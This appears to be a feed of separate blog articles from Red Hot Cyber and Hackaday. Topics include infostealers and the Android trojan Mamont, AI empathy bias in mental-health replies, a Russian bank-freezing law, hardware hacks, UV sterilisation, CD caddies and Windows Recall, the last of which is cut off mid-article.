Si intitola “Infostealer: un pacco da Babbo Natale… con dentro le tue password“ il Report di Intelligence prodotto dalla terza Live Class del corso “Dark Web & Cyber Threat Intelligence“.

Sotto la guida esperta del prof. Pietro Melillo, il team di 14 persone che ha da poco concluso il corso in Live Class realizzato da Red Hot Cyber, ha prodotto un report di intelligence sugli infostealer. Si tratta di un tema cruciale e spesso poco dibattuto, che permette di comprendere e affrontare le moderne minacce cibernetiche provenienti dalle botnet, anche dal punto di vista legale.

Babbo Natale quest’anno è in sciopero. Non si è limitato a non consegnare regali, ma ha deciso di rubare il tuo Wi-Fi, la tua carta di credito e, già che c’era, anche le tue password. Questo scenario, che sembra uscito da una commedia grottesca, rappresenta invece la realtà del mondo digitale moderno, in cui minacce come gli infostealer sono pronte a sfruttare ogni nostra distrazione ed ogni “situazione”.

[strong]Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni per partecipare alla quarta classe e per bloccare il tuo posto. Oppure scrivici a: formazione@redhotcyber.com. Ricorda che il corso è a numero chiuso e i posti sono limitati.[/strong]

Gli infostealer: cosa sono e come agiscono

Gli infostealer sono malware progettati per rubare informazioni sensibili, come credenziali di accesso, dati finanziari e altre informazioni personali. Agiscono spesso in modo silente, infiltrandosi nei dispositivi tramite email di phishing, download malevoli o vulnerabilità software. Una volta raccolti i dati, questi vengono inviati a server remoti per poi essere venduti al miglior offerente o utilizzati per scopi criminali.

La pericolosità degli infostealer risiede nella loro facilità di diffusione e nella crescente accessibilità dei malware-as-a-service (MaaS). Oggi, anche un criminale informatico alle prime armi può acquistare e utilizzare strumenti sofisticati per colpire individui e organizzazioni. Questo fenomeno ha trasformato il cybercrimine in una industria globale in continua evoluzione.

Scarica il report Infostealer: un pacco da Babbo Natale… con dentro le tue password

Botnet e infostealer: un binomio pericoloso

Il report della terza classe affronta anche il legame tra botnet e infostealer. Le botnet, reti di dispositivi compromessi e controllati da remoto, sono spesso utilizzate per distribuire infostealer su larga scala. Attraverso tecniche di command and control (C2), i cybercriminali coordinano attacchi mirati, sfruttando la potenza di centinaia o migliaia di dispositivi infetti.

Questo modello organizzato consente ai malintenzionati di raccogliere enormi quantità di dati in poco tempo, rendendo l’impatto degli infostealer particolarmente devastante. Non è un caso che queste tecniche siano sempre più utilizzate non solo per furti di identità e frodi finanziarie, ma anche per campagne di spionaggio industriale e attacchi geopolitici.

[strong]Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni per partecipare alla quarta classe e per bloccare il tuo posto. Oppure scrivici a: formazione@redhotcyber.com. Ricorda che il corso è a numero chiuso e i posti sono limitati.[/strong]

L’impatto degli infostealer

Il documento prodotto dai partecipanti al corso esplora in dettaglio l’impatto degli infostealer su individui, aziende e governi. Gli effetti possono essere devastanti:

• Per gli individui, la perdita di informazioni personali porta a furti di identità e svuotamento dei conti bancari.
• Per le aziende, la compromissione dei dati dei clienti comporta perdite economiche, danni reputazionali e sanzioni legate alla non conformità normativa.
• A livello governativo, l’utilizzo di infostealer può facilitare operazioni di spionaggio e sabotaggio.

L’analisi sottolinea come la natura discreta di questi malware renda difficile la loro individuazione, aggravando ulteriormente i danni.

Scarica il report Infostealer: un pacco da Babbo Natale… con dentro le tue password

Strategie di mitigazione e conformità normativa

Il report non si limita ad analizzare la minaccia, ma propone anche strategie di mitigazione efficaci. Dalla formazione del personale alla messa in atto di policy di cyber hygiene, passando per l’implementazione di soluzioni avanzate come endpoint detection and response (EDR) e sistemi di monitoraggio continuo, le difese devono essere proattive e multilivello.

Vengono inoltre affrontate le principali normative di riferimento, come il GDPR per la protezione dei dati personali e lo standard ISO/IEC 27001:2022 per la gestione della sicurezza delle informazioni. La conformità a queste regolamentazioni è fondamentale per ridurre il rischio e garantire la resilienza delle organizzazioni.

[strong]Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni per partecipare alla quarta classe e per bloccare il tuo posto. Oppure scrivici a: formazione@redhotcyber.com. Ricorda che il corso è a numero chiuso e i posti sono limitati.[/strong]

Dietro le quinte di XFilesStealer

Un capitolo particolarmente interessante è dedicato all’analisi di XFilesStealer, uno degli infostealer più diffusi nel panorama attuale. I partecipanti al corso hanno studiato le dinamiche di funzionamento di questo malware, svelando le sue modalità di infiltrazione, raccolta dei dati e comunicazione con i server C2. Questo tipo di analisi consente di comprendere le tecniche utilizzate dai criminali e di sviluppare contromisure più efficaci.

Scarica il report Infostealer: un pacco da Babbo Natale… con dentro le tue password

Conclusioni e prossimi passi

Il report rappresenta un contributo significativo alla comprensione delle minacce legate agli infostealer e dimostra l’importanza di una formazione mirata e approfondita. Il terzo corso “Dark Web & Cyber Threat Intelligence”, che si è concluso con successo, ha permesso agli studenti di applicare le competenze apprese in modo pratico, sotto l’attenta supervisione del prof. Pietro Melillo.

Il Quarto corso in Live Class si svolgerà a febbraio, e le iscrizioni sono già aperte.

Al termine del corso, i partecipanti avranno l’opportunità di accedere al gruppo DarkLab, un laboratorio dedicato alla ricerca avanzata sulle minacce cyber e alla produzione di report come questo. Un’occasione unica per entrare in contatto con esperti del settore e contribuire attivamente alla lotta contro il cybercrimine.

[strong]Contattaci tramite WhatsApp al 379 163 8765 per maggiori informazioni per partecipare alla quarta classe e per bloccare il tuo posto. Oppure scrivici a: formazione@redhotcyber.com. Ricorda che il corso è a numero chiuso e i posti sono limitati.[/strong]

Scarica il report Infostealer: un pacco da Babbo Natale… con dentro le tue password

L'articolo La Terza Live Class del Corso “DarkWeb & CTI” Rilascia Il Report Sugli Infostealer proviene da il blog della sicurezza informatica.

Gli specialisti di Kaspersky Lab hanno scoperto un nuovo schema di distribuzione del trojan bancario Android Mamont, rivolto agli utenti russi. Va notato che gli attacchi sono rivolti sia a privati ​​che a rappresentanti delle imprese.

Nei mesi di ottobre e novembre 2024, le soluzioni di sicurezza dell’azienda hanno respinto oltre 31.000 attacchi Mamont contro utenti russi. I ricercatori affermano che recentemente sono emerse notizie secondo cui il malware Mamont viene diffuso nelle chat, dove gli aggressori offrono agli utenti di scaricare un’applicazione presumibilmente progettata per tracciare i pacchi con elettrodomestici regalati.

Avendo deciso di scoprire come funzionava lo schema, i ricercatori hanno provato a effettuare un ordine. Nei contatti di uno dei negozi è stato trovato il collegamento a una chat chiusa su Telegram, che indicava esattamente come effettuare un ordine: per farlo bisognava scrivere un messaggio personale al gestore. La chat privata ha visto molti partecipanti attivi porre varie domande. Gli esperti non escludono che alcuni di essi possano essere bot e siano stati utilizzati anche per evitare le attività vigilanza di potenziali acquirenti.

Il direttore della chat ha spiegato che non è richiesto alcun pagamento anticipato e che presumibilmente l’ordine può essere pagato al momento del ricevimento. Il giorno successivo all’ordine, i truffatori hanno ricevuto un messaggio che informava che l’ordine era stato spedito e che esisteva una speciale applicazione mobile per seguirlo, disponibile tramite un collegamento. Come potete immaginare, il collegamento portava a un sito di phishing dal quale la vittima avrebbe dovuto scaricare Mamont.

Oltre al collegamento, agli esperti hanno fornito anche un codice per tracciare l’ordine, che dovevano inserire nella domanda. Si noti che sebbene gli specialisti abbiano informato i rappresentanti di Telegram di account e canali fraudolenti, l’amministrazione della piattaforma non ha ancora intrapreso alcuna azione per bloccarli.

Se l’utente cade nei trucchi degli aggressori e installa l’applicazione falsa per il tracciamento dei pacchetti, all’avvio il trojan richiede l’autorizzazione per funzionare in background, funzionare con notifiche push, SMS e chiamate.

Mamont chiede quindi alla vittima di inserire il numero di tracking falso, dopodiché invia una richiesta POST al server degli aggressori con i dati relativi al dispositivo e il numero di tracciamento specificato. Si ritiene che il numero venga utilizzato per identificare la vittima. Se il codice di risposta è 200, il Trojan avvia una finestra che presumibilmente scarica le informazioni sull’ordine.

Sul dispositivo della vittima vengono lanciati anche due servizi dannosi. Il primo intercetta tutte le notifiche push e le inoltra al server degli hacker. Il secondo stabilisce una connessione con il server WebSocket degli aggressori.

Tra i comandi supportati dal malware ci sono: cambiare o nascondere l’icona dell’applicazione (changeIcon e hide), mostrare messaggi arbitrari (custom), inviare tutti gli SMS in arrivo negli ultimi tre giorni (oldsms), inviare messaggi SMS (sms), scaricare le foto dalla galleria (foto) e così via.

Va notato che meritano un’attenzione particolare i comandi personalizzati, che coinvolgono il malware che interagisce con l’utente.

Infatti, tali comandi aiutano gli aggressori a ingannare la vittima facendo inserire le loro credenziali. Quando l’utente riceve questo comando, vede una finestra con un campo per inserire informazioni di testo, che vengono poi inviate al server degli aggressori.

Il comando foto è simile a quello personalizzato, ma invece di una finestra di testo mostra una finestra per il caricamento delle immagini. Molto probabilmente, in questo modo, gli hacker stanno cercando di raccogliere dati per ulteriori frodi utilizzando l’ingegneria sociale (ad esempio, frodando denaro per conto delle forze dell’ordine o dei regolatori).

I ricercatori riassumono che, nonostante la sua semplicità, Mamont ha tutte le funzioni necessarie per rubare le credenziali, nonché per gestire l’SMS banking.

L'articolo Mamont: Il Trojan Android che Inganna con False Promesse di Regali e Tracking proviene da il blog della sicurezza informatica.

Among us Hackaday writers, there are quite a few enthusiasts for retro artifacts – and it gets even better when they’re combined in an unusual way. So, when we get a tip about a build like this by [Sam Christy], our hands sure start itching.

The story of this texting typewriter is one that beautifully blends nostalgia and modern technology. [Sam], an engineering teacher, transformed a Panasonic T36 typewriter into a device that can receive SMS messages, print them out, and even display the sender’s name and timestamp. For enthusiasts of retro gadgets, this creation bridges the gap between analog charm and digital convenience.

What makes [Sam]’s hack particularly exciting is its adaptability. By effectively replacing the original keyboard with an ESP32 microcontroller, he designed the setup to work with almost any electric typewriter. The project involves I2C communication, multiplexer circuits, and SMS management via Twilio. The paper feed uses an “infinite” roll of typing paper—something [Sam] humorously notes as outlasting magnetic tape for storage longevity.

Beyond receiving messages, [Sam] is working on features like replying to texts directly from the typewriter. For those still familiar with the art form of typing on a typewriter: how would you elegantly combine these old machines with modern technology? While you’re thinking, don’t overlook part two, which gives a deeper insight in the software behind this marvel!

youtube.com/embed/QkY-vZrAu2g?…

hackaday.com/2024/12/18/back-t…

L’anonimato di Internet sta diventando un’ancora di salvezza per milioni di americani in cerca di supporto psicologico. Secondo una recente ricerca, più di 150 milioni di persone negli Stati Uniti vivono in aree con una grave carenza di professionisti della salute mentale, costringendole a rivolgersi ai social network per chiedere aiuto.

I ricercatori del MIT, della New York University e dell’UCLA hanno studiato più di 12.000 post Reddit e 70.000 risposte da 26 subreddit sulla salute mentale. Lo scopo dello studio: sviluppare criteri con cui sarà possibile valutare le capacità di supporto psicologico di grandi modelli linguistici come GPT-4.

Nell’esperimento, due psicologi clinici hanno analizzato 50 richieste di aiuto selezionate casualmente su Reddit. Ogni post era accompagnato da una risposta reale di un altro utente della piattaforma o da un testo generato dall’intelligenza artificiale. Gli esperti, senza conoscere l’origine delle risposte, hanno valutato caso per caso il livello di empatia.

I risultati sono stati sorprendenti. GPT-4 non solo ha dimostrato una maggiore empatia, ma è stato anche più efficace del 48% nel motivare le persone a apportare cambiamenti positivi.

Ma ecco cosa è allarmante: l’IA si è rivelata un terapista piuttosto parziale. I livelli di empatia nelle risposte GPT-4 sono diminuiti del 2-15% per gli utenti neri e del 5-17% per gli utenti asiatici rispetto ai bianchi o a coloro la cui razza non era specificata.

Per confermarlo, i ricercatori hanno campionato post che includevano indicatori demografici espliciti (ad esempio, “sono una donna nera di 32 anni”) e riferimenti impliciti a gruppi (ad esempio, menzionando i capelli naturali come indicatore della razza).

Quando le informazioni demografiche erano incluse esplicitamente o implicitamente nei messaggi, le persone avevano maggiori probabilità di mostrare una maggiore empatia, soprattutto dopo segnali indiretti. GPT-4, al contrario, ha generalmente mantenuto un tono coerente indipendentemente dalle caratteristiche demografiche dell’autore del post (ad eccezione delle donne di colore).

Anche la struttura e il contesto della query influenzano in modo significativo la qualità delle risposte del modello linguistico. Un ruolo importante viene giocato specificando lo stile di comunicazione (clinica, social-media) e il modo in cui vengono utilizzate le caratteristiche demografiche del paziente.

La rilevanza dello studio è dimostrata dai recenti tragici eventi. Nel marzo dello scorso anno, un uomo belga si è suicidato dopo aver comunicato con il chatbot ELIZA, che funziona sul modello linguistico GPT-J. Un mese dopo, la National Eating Disorders Association è stata costretta a chiudere il suo bot Tessa, che aveva iniziato a fornire consigli dietetici ai pazienti con disturbi alimentari.

La professoressa Marzieh Ghassemi del MIT sottolinea che i modelli linguistici sono già utilizzati attivamente nelle istituzioni mediche per automatizzare i processi di routine. In un’intervista, ha condiviso le sue scoperte: “Abbiamo scoperto che gli attuali modelli linguistici, sebbene meno focalizzati sui fattori demografici rispetto alle persone nel contesto del supporto psicologico, producono ancora risposte diverse per diversi gruppi di pazienti. Abbiamo un grande potenziale per migliorare questi modelli in modo che possano fornire cure migliori e più efficaci”.

L'articolo L’IA come Terapista? Dimostra empatia, ma con pregiudizi nascosti. Lo studio del MIT/UCLA proviene da il blog della sicurezza informatica.

Il Ministero degli Affari Interni (MVD) della Federazione Russa ha ricevuto l’approvazione dalla Commissione governativa per l’attività legislativa per una proposta di legge che consentirà a investigatori e inquirenti di bloccare temporaneamente i conti bancari sospetti senza un’autorizzazione giudiziaria. Questa misura mira a contrastare più efficacemente le frodi informatiche e telefoniche, accelerando il processo di risarcimento per le vittime di tali crimini. La notizia è stata riportata da SecurityLab.ru nel loro articolo del 9 dicembre 2024.

Dettagli della proposta legislativa

1. Blocco immediato senza decisione giudiziaria:
   Gli investigatori, previa approvazione dai loro superiori, e gli inquirenti, con il consenso del procuratore, potranno ordinare alle banche di bloccare conti, depositi e fondi elettronici associati ad attività sospette.
2. Durata del blocco:
   Il provvedimento potrà durare massimo 10 giorni. Se durante questo periodo non si trovano prove sufficienti, il blocco verrà revocato automaticamente.
3. Identificazione del conto:
   Le banche saranno obbligate ad agire entro 24 ore dalla notifica. Sarà sufficiente fornire informazioni come il numero di telefono o della carta per identificare il conto da bloccare.
4. Accesso alle informazioni bancarie:
   La legge prevede inoltre l’accesso diretto alle informazioni bancarie senza necessità di un ordine giudiziario. Questa estensione dei poteri d’indagine è controversa e solleva questioni relative alla riservatezza dei dati personali.

Reazioni e dibattito

• Banca Centrale russa:
  Ha espresso preoccupazione per la possibile violazione della privacy e ha proposto di limitare l’applicazione della legge a sole cinque categorie di reati specifici del Codice Penale. Tale proposta è stata respinta dal MVD e dalla Procura Generale, che sostengono invece un’applicazione più ampia per combattere vari tipi di crimini finanziari.
• Bilanciamento tra sicurezza e privacy:
  Il provvedimento mira a contrastare la crescente minaccia delle frodi online e telefoniche, garantendo un rapido risarcimento alle vittime. Tuttavia, la possibilità di accedere alle informazioni finanziarie senza controllo giudiziario potrebbe minare la fiducia dei cittadini nelle istituzioni finanziarie e violare i diritti fondamentali alla privacy.

Implicazioni per la cybersicurezza

Questa misura evidenzia una tendenza globale verso una maggiore rigidità nel contrastare i crimini finanziari, ma pone questioni rilevanti:

1. Prevenzione dei crimini informatici:
   Un blocco tempestivo può prevenire il trasferimento fraudolento di fondi, riducendo l’impatto delle frodi.
2. Protezione dei dati personali:
   L’assenza di una supervisione giudiziaria immediata potrebbe portare a un uso improprio delle informazioni personali e a possibili abusi di potere.
3. Conformità e applicazione:
   Le banche dovranno adattarsi rapidamente a queste nuove normative, garantendo processi di blocco efficienti entro le 24 ore richieste.

Questa nuova proposta legislativa del MVD rappresenta un passo significativo nella lotta contro le frodi digitali, ma pone sfide complesse per la cybersicurezza, la protezione dei dati e il rispetto dei diritti civili. Sarà cruciale monitorare l’applicazione pratica di questa legge per garantire che il bilanciamento tra sicurezza e tutela della privacy sia rispettato.

L'articolo Il Ministero degli Affari Interni russo potrà bloccare i conti bancari proviene da il blog della sicurezza informatica.

Extremophile lifeforms on Earth are capable of rather astounding feats, with the secret behind the extreme radiation resistance of one of them now finally teased out by researchers. As one of the most impressive extremophiles, Deinococcus radiodurans is able to endure ionizing radiation levels thousands of times higher than what would decisively kill a multicellular organism like us humans. The trick is the antioxidant which this bacterium synthesizes from multiple metabolites that combine with manganese. An artificial version of this antioxidant has now been created that replicates the protective effect.

The ternary complex dubbed MDP consists of manganese ions, phosphate and a small peptide, which so far has seen application in creating vaccines for chlamydia. As noted in a 2023 study in Radiation Medicine and Protection by [Feng Liu] et al. however, the D. radiodurans bacterium has more survival mechanisms than just this antioxidant. Although much of the ionizing radiation is neutralized this way, it can not be fully prevented. This is where the highly effective DNA repair mechanism comes into play, along with a range of other adaptations.

The upshot of this is the synthesis of a very effective and useful antioxidant, but as alluded to in the press releases, just injecting humans with MDP will not instantly give them the same super powers as our D. radiodurans buddy.

Featured image: Survival mechanisms in Deinococcus radiodurans bacterium. (Credit: Feng Liu et al., 2023)

hackaday.com/2024/12/18/bacter…

Back in the bad old days, dealing with DNA and RNA in a lab setting was often fraught with peril. Detection technologies were limited to radioisotopes and hideous chemicals like ethidium bromide, a cherry-red solution that was a fast track to cancer if accidentally ingested. It took time, patience, and plenty of training to use them, and even then, mistakes were commonplace.

Luckily, things have progressed a lot since then, and fluorescence detection of nucleic acids has become much more common. The trouble is that the instruments needed to quantify these signals are priced out of the range of those who could benefit most from them. That’s why [Will Anderson] et al. came up with DIYNAFLUOR, an open-source nucleic acid fluorometer that can be built on a budget. The chemical principles behind fluorometry are simple — certain fluorescent dyes have the property of emitting much more light when they are bound to DNA or RNA than when they’re unbound, and that light can be measured easily. DIYNAFLUOR uses 3D-printed parts to hold a sample tube in an optical chamber that has a UV LED for excitation of the sample and a TLS2591 digital light sensor to read the emitted light. Optical bandpass filters clean up the excitation and emission spectra, and an Arduino runs the show.

The DIYNAFLUOR team put a lot of effort into making sure their instrument can get into as many hands as possible. First is the low BOM cost of around $40, which alone will open a lot of opportunities. They’ve also concentrated on making assembly as easy as possible, with a solder-optional design and printed parts that assemble with simple fasteners. The obvious target demographic for DIYNAFLUOR is STEM students, but the group also wants to see this used in austere settings such as field research and environmental monitoring. There’s a preprint available that shows results with commercial fluorescence nucleic acid detection kits, as well as detailing homebrew reagents that can be made in even modestly equipped labs.

hackaday.com/2024/12/18/simple…

This week and next we take off for the holidays! We have an exciting schedule after the break, so stay tuned!

youtube.com/embed/3NWvKm6fIg8?…

Did you know you can watch the live recording of the show Right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2024/12/18/floss-…

2020 saw the world rocked by widespread turmoil, as a virulent new pathogen started claiming lives around the globe. The COVID-19 pandemic saw a rush on masks, air filtration systems, and hand sanitizer, as terrified populations sought to stave off the deadly virus by any means possible.

Despite the fresh attention given to indoor air quality and airborne disease transmission, there remains one technology that was largely overlooked. It’s the concept of upper-room UV sterilization—a remarkably simple way of tackling biological nastiness in the air.

Warm Glowing Killing Glow

Upper-room UV systems sound kind of like science-fiction technology. They nuke nasty pathogens in the air, and do it while emitting a faint and weird-colored glow. In reality, they’ve been quietly hanging around for about 80 years. The idea is straightforward enough—you just shine UV-C light in the unused overhead zone of a room to zap airborne pathogens before they get inhaled by fragile humans!
Upper-room UV sterilization keeps the harmful UV-C light away from the occupants in the room. Credit: CDC
The concept came about as a direct result of 19th-century research that determined sunlight inhibited the growth of undesirable microbes and pathogens. Later work determined that light in the UV-C range of wavelengths is remarkably good at killing both bacteria and viruses, making it ideal for sterilizing purposes. The UV-C range is from 100 to 280 nanometers, but peak sterilizing action occurs around the 250-270 nm range. The primary method of action is that the UV-C light creates defects in DNA molecules that kill or inactivate microscopic organisms, including bacteria and viruses. It’s perfect for tackling all sorts of nasties, from measles to SARS to TB.

Unfortunately, that also means that UV-C light isn’t always safe to use around humans. Just as it hurts microbes, this light is also harmful to our skin and eyes in exactly the same way. Indeed, a prime example of this was a 2023 event that allegedly accidentally used UV sterilization lamps as decorative blacklights. While UV-C light is used in a wide range of sterilization applications, most keep the light hidden or localized to avoid direct human exposure.

Upper-room UV-C installations are particularly interesting, though, for their simplicity. To avoid dangerous exposures, these installations simply place the sterilizing lamps up high in a room and direct their light into the upper level of air. As long as the UV light output is directed into the top level of the room, well above the heads of any occupants, it can sterilize the air effectively with little risk of harm.
UV-C lamps typically have peak output at 254 nm, but they also output some light in the visual spectrum that gives them a characteristic green glow—as seen on this Phillips wall-mount unit. Credit: Phillips
For this reason, these systems are typically installed in places like schools, hospitals and other public buildings, where ceiling heights are high enough to make such installations safe. CDC guidelines suggest minimum ceiling heights must be at least 8 feet for these installations, though 8.5 feet is preferred. For most people, that’s high enough not to cause trouble, but if you’re one of the taller players in the NBA, you might want to take note.

Upper-room UV systems treat a massive volume of air simply by sectioning the room into a germ-killing overhead zone and a safer lower zone where people breathe. Natural convection, HVAC currents, and even a simple ceiling fan help keep the air circulating upward, doused by the UV field, and then returned to the lower portion, scrubbed clean. At least a minimal level of circulation is required in order to ensure all the air in a given room is being treated. Power levels required are relatively low. A 2015 study suggested a total output of just 15-20 milliwatts is enough per cubic meter of room volume, assuming adequate air mixing in the space.

Ultimately, though, proper sizing and safe installation are critical for creating an effective and safe sterilization system. UV-C is safe enough when used properly, but get it wrong, and you’ll see plenty of sore eyes and red skin almost immediately. The key is blocking direct and reflected UV light from reaching the lower zone of the room. Louvered fixtures with carefully aimed beams are necessary in rooms with lower ceilings, while more open fixtures are more for lofty spaces where they can blast UV upward without frying everyone’s eyeballs. Proper metering must be done at the time of installation to ensure light concentration is high enough in the sterilization region, and below safety limits in the occupied region. It’s also important to ensure the lamps are switched off for maintenance or if anyone is entering the upper zone of the room for any reason.

It might sound high-tech, but this approach predates modern pandemics by decades. It was already showing its effectiveness against diseases like measles and tuberculosis as far back as the 1930s and 1940s. Early success was found at Duke University in 1936, where post-surgical infections were cut from 11.62% to just 0.24% with the use of an operating room eqiupped with UV-C equipment. Later, a 1941 study determined that UV-C delivered by mercury-vapor lamps had drastically reduced measles transmission in classrooms.
This installation used bare UV-C bulbs, directing them with louvers or hiding them in a perforated sub-ceiling. Note the eerie green glow. Credit: research paper
Given its efficacy, you might think that upper room UV-C installations would be everywhere. Subways, airports, schools, hospitals, and malls could all benefit from this technology. However, it would require some investment and ongoing maintenance, and it seems that simple cost is too much to bear.

For whatever reason, upper-room UV remains an obscure technology, seldom discussed and rarely used. Here we are, after countless deadly airborne disease outbreaks, still largely ignoring a century-old technology that actually works. The simplicity is staggering—slap a UV fixture on the wall near the ceiling, tune it so that zero harmful light hits the occupants, and let it run. It’s not a silver bullet for all air quality concerns, and you still need ventilation, of course. But for dealing with nasty airborne pathogens? It’s hard to imagine an easier solution than upper-room UV. The only real question left is, why aren’t we using it everywhere?

Featured image by the US CDC.

hackaday.com/2024/12/18/upper-…

With the recent teardown of the Raspberry Pi 500, there were immediately questions raised about the unpopulated M.2 pad and related traces hiding inside. As it turns out, with the right parts and a steady hand it only takes a bit of work before an NVMe drive can be used with the RP500, as [Jeff Geerling] obtained proof of. This contrasts with [Jeff]’s own attempt involving the soldering on of an M.2 slot, which saw the NVMe drive not getting any power.
The four tiny coupling capacitors on the RP500’s PCIe traces. (Source: Jeff Geerling)
The missing ingredients turned out to be four PCIe coupling capacitors on the top of the board, as well as a source of 3.3 V. In a pinch you can make it work with a bench power supply connected to the pads on the bottom, but using the bottom pads for the intended circuitry would be much neater.

This is what [Samuel Hedrick] pulled off with the same AP3441SHE-7B as is used on the Compute Module 5 IO board. The required BOM for this section which he provides is nothing excessive either, effectively just this one IC and required external parts to make it produce 3.3V.

With the added cost to the BOM being quite minimal, this raises many questions about why this feature (and the PoE+ feature) were left unpopulated on the PCB.

Featured image: The added 3.3v rail on the Raspberry Pi 500 PCB. (Credit: Samuel Hedrick)

hackaday.com/2024/12/18/enabli…

These days, very few of us use optical media on the regular. If we do, it’s generally with a slot-loading console or car stereo, or an old-school tray-loader in a desktop or laptop. This has been the dominant way of using consumer optical media for some time.

Step back to the early CD-ROM era, though, and things were a little kookier. Back in the late 1980s and early 1990s, drives hit the market that required the use of a bulky plastic caddy to load discs. The question is—why did we apparently need caddies then, and why don’t we use them any longer?

Caddyshack

Early CD players, like this top-loading Sony D-50, didn’t use caddies. Credit: Binarysequence, CC BY-SA 4.0
The Compact Disc, as developed by Phillips and Sony, was first released in 1982. It quickly became a popular format for music, offering far higher fidelity than existing analog formats like vinyl and cassettes. The CD-ROM followed in 1985, offering hundreds of megabytes of storage in an era when most hard drives barely broke 30 MB. The discs used lasers to read patterns of pits and lands from a reflective aluminum surface, encased in tough polycarbonate plastic. Crucially, the discs featured robust error correction techniques so that small scratches, dust, or blemishes wouldn’t stop a disc from working.

Notably, the first audio CD player—the Sony CDP-101—was a simple tray-loading machine. Phillips’ first effort, the CD100, was a top-loader. Neither used a caddy. Nor did the first CD-ROM drives—the Phillips CM100 was not dissimilar from the CD100, and tray loaders were readily available too, like the Amdek Laserdrive-1.
Sony had the most popular design for CD caddies. Manufacturers including Hitachi, Apple, and Toshiba used the same design. Credit: Pysky, CC BY-SA 3.0
So where did caddies come from? The concept had existed prior to CDs, most notably for the failed Capacitance Electronic Disc format created by RCA. Those discs were highly susceptible to problems with dust, so they were kept in caddies for their protection. For CDs, the caddy wasn’t a necessity—the plastic optical discs were robust enough to be handled directly. And yet, in the late 1980s, caddy CD-ROM drives started to become the norm in the nascent market, with Apple and Sony perhaps the most notable early adopters.
Apple’s early drives—both internal and external—relied on caddies. Credit: All About Apple Museum, CC-BY-SA-2.5-it
The basic concept of the caddy is fairly obvious by its design. Various non-compatible versions existed from different manufacturers, but the intent was the same. The CD itself was placed in a plastic case with some kind of sliding shutter. This case protected the CD from scratches, dust, smudges, and other contaminants. When it was placed in a drive, the shutter would slide or rotate out of the way, allowing access for the optical head to read the disc.

For many early applications, CD-ROMs were very much an archival format. They offered long-term storage, were non-writable, and had huge capacity. They were perfect for creating digital encyclopedias, with a single disc able to replace a stack of bound volumes that would take up a whole shelf. They were also perfect for commercial or industry use, where large databases or reference volumes could be stored in a far smaller format than ever before.
Plenty of reference materials were delivered via CD-ROM, and they didn’t come cheap—as per this Sony catalog from 1991.
In these cases, though, it’s important to remember that CDs were quite expensive. For example, in 1986, a copy of Grolier’s Academic Encyclopedia would cost $199—or roughly $570 in today’s money. As robust as CDs were, it was at times desirable to protect such an investment with the added safety and security of a caddy. This was particularly useful in library, school, and business contexts, too, where end users couldn’t always be relied upon to use the discs gently.

Caddies also offered another side benefit of particular use to the radio industry. They made it very quick and easy to change discs, easing the work of on-air DJs as they cued up songs. Compare the ease of slamming in a cartridge, versus extracting a disc from a jewel case and gently placing it in a tray-loading drive. Under the pressure of a live broadcast, it’s clear to see the benefit of the caddy design. Particularly as sloppy handling would quickly damage discs that were on heavy rotation.

Caddies made sense at a time when the CDs and their content were incredibly expensive. They also made sense for professional media and corporate users. However, for the consumer, they quickly became a frustration rather than a boon.
This 8x caddy-loading CD-ROM drive was built by NEC. Credit: Derell Licht, Attribution-NoDerivs (CC BY-ND 2.0)
The problem for home users was simple. Caddies added a certain level of expense that became less justified as the price of CD-ROM titles came down. The intent was that users would have a caddy for each disc in their collection, protecting the CDs and making them easy to load. However, many home users only had one or a handful of caddies. This meant users were often swapping discs from caddy to caddy, with the repetitive manual handling negating any benefit of the caddies in the first place. It quickly became an unwelcome chore for owners of caddy-loading drives.

As is the way, the market soon responded. By the late 1990s, caddy-based CD drives had mostly disappeared from the consumer market in favor of more convenient, caddy-free drives. Customers wanted easy-to-use drives, and they had no desire to put up with fussy plastic cases that were ultimately unnecessary. Tray-loaders became the norm for most CD-ROM applications, with slot loaders becoming more popular as a fancier option in some premium hardware.
Caddy CD players were popular in the radio world. Credit: via eBay
Caddies did persist, but in more niche contexts. Standards like Mini Disc and UMD relied on integral, non-removable caddies, because Sony could never quite let go of the idea. Similarly, some early DVD-RAM drives relied on caddies too, as have various high-capacity optical archive standards. In these applications, caddies were chosen for two reasons—they were there to protect media that was either particularly delicate, valuable, or both. In the vast majority of cases, the caddy became an integral part of the media—rather than an external cart which discs could be swapped into and out of.

Caddy-based CD drives represent a transitional period in the early days of optical media. The lines between serious archival users and home users were blurred, and nobody quite knew where the technology was going. They highlight a period when engineers and manufacturers were still exploring the best methods build reliable drives that best met their users needs. From a consumer perspective, these protective devices are now curious relics in the post-optical era—a reminder of when laser-based media was on the absolute cutting edge of technology. How times have changed.

hackaday.com/2024/12/18/why-di…

Microsoft sta testando ancora una volta la funzionalità Recall, il cui rilascio era stato precedentemente ritardato a causa di problemi di privacy e sicurezza. Recall è attualmente disponibile solo per i membri del programma Windows Insiders, ma gli utenti hanno già notato dei problemi: la funzione salva numeri di carte bancarie, numeri di previdenza sociale e altre informazioni sensibili, anche quando è vietata.

Come funziona Windows Recall

Ricordiamo che Recall è stato introdotto a maggio 2024. La funzionalità è pensata per aiutare a “ricordare” qualsiasi informazione che l’utente ha visualizzato in passato, rendendola accessibile tramite una semplice ricerca. Pertanto, Recall, che doveva essere abilitato per impostazione predefinita su tutti i nuovi PC Copilot+, scatta un’istantanea della finestra attiva sullo schermo ogni pochi secondi, registrando tutto ciò che accade in Windows, sia che si visiti i siti Web in un browser, comunicando in modo istantaneo. messenger o lavorare con altre applicazioni.

Le immagini risultanti vengono elaborate dalla Neural Processing Unit (NPU) del dispositivo e da un modello AI per estrarre i dati dagli screenshot. Le informazioni vengono quindi archiviate nel database e gli utenti possono effettuare ricerche nella cronologia utilizzando query nella loro lingua madre.

